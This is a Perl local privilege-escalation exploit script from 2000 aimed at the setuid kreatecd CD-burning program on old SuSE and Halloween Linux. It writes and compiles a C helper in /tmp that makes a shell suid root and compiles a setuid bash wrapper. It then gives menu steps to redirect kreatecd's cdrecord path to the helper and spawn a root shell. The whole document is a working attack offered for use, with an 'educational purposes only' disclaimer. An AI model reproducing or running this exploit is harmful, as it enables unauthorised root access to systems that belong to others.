#!/usr/bin/perl

# kreatecd local root-exploit helper script.
# Tested on:
#  Halloween Linux 4.0
#  S.u.S.E. Linux 6.3
#  S.u.S.E. Linux 6.2
#  S.u.S.E. Linux 6.1
#  S.u.S.E. Linux 6.0

# (C) 2000 C-skills development, S. Krahmer under the GPL
# http://www.cs.uni-potsdam.de/homepages/students/linuxer

#
# visit TESO at http://teso.scene.at/ or https://teso.scene.at/
#

# ! USE IT AT YOUR OWN RISK !
# For educational purposes only.

if (((stat "/opt/kde/bin/kreatecd")[2] & 04000) != 04000 && 
    ((stat "/usr/bin/kreatecd")[2] & 04000) != 04000)  {
	print "kreatecd not installed suid! handshake with root!\n";
	exit 1;
}

print "kreatecd installed suid!\n";
print "Contact your local script-kiddie.\n";
print "Nobody ever got fired for NOT using GUI-suid-rootprograms! remove it!\n";
print "Creating suid-maker...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
	setreuid(0,0);
	chown("/tmp/boomsh", 0, 0);
	chmod("/tmp/boomsh", 04755);
	exit(1);
}
_EOF_
close O;
system("cc /tmp/boom.c -o /tmp/xxx");

print "Creating boom-shell...\n";
open O, ">/tmp/boomsh.c" or die "open(boomsh.c..)";
print O<<_EOF2_;

int main()
{
	char *a[] = {
		"/bin/bash",
		0
	};
	setuid(0); 
	execve(*a, a, 0);
	return 0;
}
_EOF2_
close O;
system("cc /tmp/boomsh.c -o /tmp/boomsh");
print <<_EOF3_;
\nExecute kreatecd and follow the menus:
Configure -> Paths  -- change the path for cdrecord to /tmp/xxx
Apply -> OK
Configure -> SCSI -> OK
\nExecute /tmp/boomsh\n
\nBEHAVE!\n
_EOF3_

#                    www.hack.co.za                    #